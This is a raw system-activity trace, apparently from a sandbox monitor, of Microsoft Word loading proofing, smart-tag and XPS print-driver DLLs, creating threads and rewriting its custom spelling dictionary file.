    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.MAB.IC.ELKAC Access: query and write and read Type: commit Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499542087
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.IB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499544438
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.JB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499544857
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.KB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499545214
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.LB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499545709
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.MB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499546053
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.NB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499546698
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.OB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547036
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.PB.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547361
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.AC.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499547683
    Section loaded Path: \BaseNamedObjects\MSCTF.MarshalInterface.FileMap.AJH.BC.ELKAC Access: query and write and read and execute and extend size Type: unknown Baseaddress: 1AC0000 Size: 4096 Protection: read write Mapped to pid: own pid success or wait 499548254
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: write and read and execute Type: commit Baseaddress: 1AC0000 Size: 126976 Protection: execute Mapped to pid: own pid success or wait 501803665
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: query and write and read and execute Type: image Baseaddress: 37320000 Size: 135168 Protection: read write Mapped to pid: own pid success or wait 501807913
    Section loaded Path: \KnownDlls\WINSPOOL.DRV Access: write and read and execute Type: unknown Baseaddress: 37320000 Size: 135168 Protection: read write Mapped to pid: own pid object name not found 501819004
    Section loaded Path: C:\WINDOWS\system32\winspool.drv Access: query and write and read and execute Type: image Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 501820517
    Section loaded Path: \KnownDlls\OLEACC.dll Access: write and read and execute Type: unknown Baseaddress: 73000000 Size: 155648 Protection: read write Mapped to pid: own pid object name not found 501827877
    Section loaded Path: C:\WINDOWS\system32\oleacc.dll Access: query and write and read and execute Type: image Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid success or wait 501829798
    Section loaded Path: \KnownDlls\MSVCP60.dll Access: write and read and execute Type: unknown Baseaddress: 74C80000 Size: 180224 Protection: read write Mapped to pid: own pid object name not found 501837133
    Section loaded Path: C:\WINDOWS\system32\msvcp60.dll Access: query and write and read and execute Type: image Baseaddress: 76080000 Size: 413696 Protection: read write Mapped to pid: own pid success or wait 501838814
    Section loaded Path: C:\WINDOWS\system32\oleaccrc.dll Access: query and read Type: commit Baseaddress: 1AD0000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 501860487
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\FNAME.DLL Access: query and read Type: commit Baseaddress: 1C70000 Size: 49152 Protection: readonly Mapped to pid: own pid success or wait 501911842
    Section loaded Path: C:\WINDOWS\system32\stdole2.tlb Access: query and read Type: commit Baseaddress: 1C80000 Size: 16384 Protection: readonly Mapped to pid: own pid success or wait 501928970
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL Access: write and read and execute Type: commit Baseaddress: 1C90000 Size: 20480 Protection: execute Mapped to pid: own pid success or wait 501937238
    Section loaded Path: C:\PROGRA~1\COMMON~1\MICROS~1\SMARTT~1\1033\STINTL.DLL Access: query and write and read and execute Type: image Baseaddress: 374B0000 Size: 24576 Protection: read write Mapped to pid: own pid success or wait 501941219
    Thread created PID: 296 TID: 1800 EIP: 7C8106F9 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Injected: false success or wait 502433527
    Thread resumed TID: 1800 PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 502433804
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL Access: write and read and execute Type: commit Baseaddress: 1EA0000 Size: 86016 Protection: execute Mapped to pid: own pid success or wait 503173981
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSPELL3.DLL Access: query and write and read and execute Type: image Baseaddress: 3F000000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 503178230
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSSP3EN.LEX Access: query and read Type: commit Baseaddress: 1EB0000 Size: 364544 Protection: readonly Mapped to pid: own pid success or wait 505429842
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL Access: write and read and execute Type: commit Baseaddress: 1F10000 Size: 536576 Protection: execute Mapped to pid: own pid success or wait 505439243
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\MSLID.DLL Access: query and write and read and execute Type: image Baseaddress: 507C0000 Size: 540672 Protection: read write Mapped to pid: own pid success or wait 505443992
    Section loaded Path: \BaseNamedObjects\DfSharedHeap33678 Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505647734
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505649701
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 505651821
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 505652294
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505655606
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 505656739
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505658171
    File moved New path: unknown Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~WRI0000 success or wait 505659753
    Section loaded Path: \BaseNamedObjects\DfSharedHeap3369A Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505660748
    Section loaded Path: \BaseNamedObjects\DfSharedHeap336AD Access: query and write and read Type: reserve Baseaddress: 2320000 Size: 4194304 Protection: read write Mapped to pid: own pid success or wait 505665712
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505667699
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 54 Value: 0D 48 61 6E 75 65 6C 65 20 42 61 73 65 72 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 success or wait 505669501
    File write Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC Offset: none Length: 108 Value: 0D 00 48 00 61 00 6E 00 75 00 65 00 6C 00 65 00 20 00 42 00 61 00 73 00 65 00 72 00 00 00 00 00 08 00 00 00 02 00 48 00 42 00 00 00 61 00 00 00 09 00 00 00 0F 00 00 00 05 00 00 00 16 00 00 00 09 00 00 00 01 00 1C 2E D3 00 04 A4 2E D3 00 02 FC 2E D3 00 09 54 FC 8C 00 01 A0 FC 8C 00 08 FC FD 8C 00 0D success or wait 505670248
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505670626
    File deleted Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\~$CUSTOM.DIC success or wait 505671770
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505674167
    File other operation Disposition: PositionInformation Data : Offset: 0 Path: C:\Documents and Settings\Administrator\Application Data\Microsoft\Proof\CUSTOM.DIC success or wait 505678473
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: write and read and execute Type: commit Baseaddress: 2320000 Size: 3346432 Protection: execute Mapped to pid: own pid success or wait 505747927
    Section loaded Path: C:\Program Files\Common Files\Microsoft Shared\PROOF\1033\MSGR3EN.DLL Access: query and write and read and execute Type: image Baseaddress: 3F100000 Size: 3346432 Protection: read write Mapped to pid: own pid success or wait 505749487
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506242420
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506521867
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506572531
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506801343
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506917942
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 506981770
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507589571
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507637926
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507657754
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507696464
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507728734
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507763189
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 507825459
    Message posted HWND: 10176 Message: C141 WParam: 0 LParam: 0 success 508027309
    Thread created PID: 296 TID: 236 EIP: 7C8106F9 Imagepath: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE Injected: false success or wait 522514599
    Thread resumed TID: 236 PID: 296 Path: C:\Program Files\Microsoft Office\OFFICE11\WINWORD.EXE success or wait 522515316
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 745472 Protection: execute Mapped to pid: own pid success or wait 522633679
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\unidrvui.dll Access: query and write and read and execute Type: image Baseaddress: 7E5A0000 Size: 761856 Protection: read write Mapped to pid: own pid success or wait 522638248
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522662126
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522678602
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522681392
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522685568
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522706820
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522715428
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522717684
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522719983
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B10000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522733826
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B20000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522742112
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B20000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522744791
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522747012
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll Access: write and read and execute Type: commit Baseaddress: 2B10000 Size: 765952 Protection: execute Mapped to pid: own pid success or wait 522765795
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdrv.dll Access: query and write and read and execute Type: image Baseaddress: 3F500000 Size: 786432 Protection: read write Mapped to pid: own pid success or wait 522768107
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522783577
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522793775
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522796137
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522798520
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2B20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522814486
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2B30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522823214
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2B30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522825551
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522827919
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522848346
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522857318
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522859765
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522862250
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522877036
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522885644
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522888479
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522890956
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522905870
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522914399
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522916834
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522919309
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522938138
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522948173
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522950588
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522953063
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 522968873
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 522977367
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 522979803
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 522982275
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: write and read and execute Type: commit Baseaddress: 2F20000 Size: 81920 Protection: execute Mapped to pid: own pid success or wait 523009678
    Section loaded Path: C:\WINDOWS\system32\fontsub.dll Access: query and write and read and execute Type: image Baseaddress: 69310000 Size: 94208 Protection: read write Mapped to pid: own pid success or wait 523013270
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523035435
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523043938
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523046295
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523048679
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523062704
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523070124
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523072447
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523074824
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523088795
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523097110
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523099654
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523102379
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523156349
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523164623
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523166905
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523169223
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523188169
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523196431
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523198727
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523201037
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523214815
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523223084
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523225357
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523227674
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523248229
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523256575
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523258944
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523261305
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523275299
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523284168
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523286589
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523288974
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523304272
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523312868
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523315484
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: query and write and read and execute Type: image Baseaddress: 3F960000 Size: 212992 Protection: read write Mapped to pid: own pid success or wait 523318234
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.BUD Access: query and read Type: commit Baseaddress: 2F20000 Size: 61440 Protection: readonly Mapped to pid: own pid success or wait 523333537
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.ini Access: query and read Type: commit Baseaddress: 2F30000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 523341931
    Section loaded Path: C:\WINDOWS\system32\spool\drivers\w32x86\3\mxdwdui.dll Access: write and read and execute Type: commit Baseaddress: 2F30000 Size: 200704 Protection: execute Mapped to pid: own pid success or wait 523344462
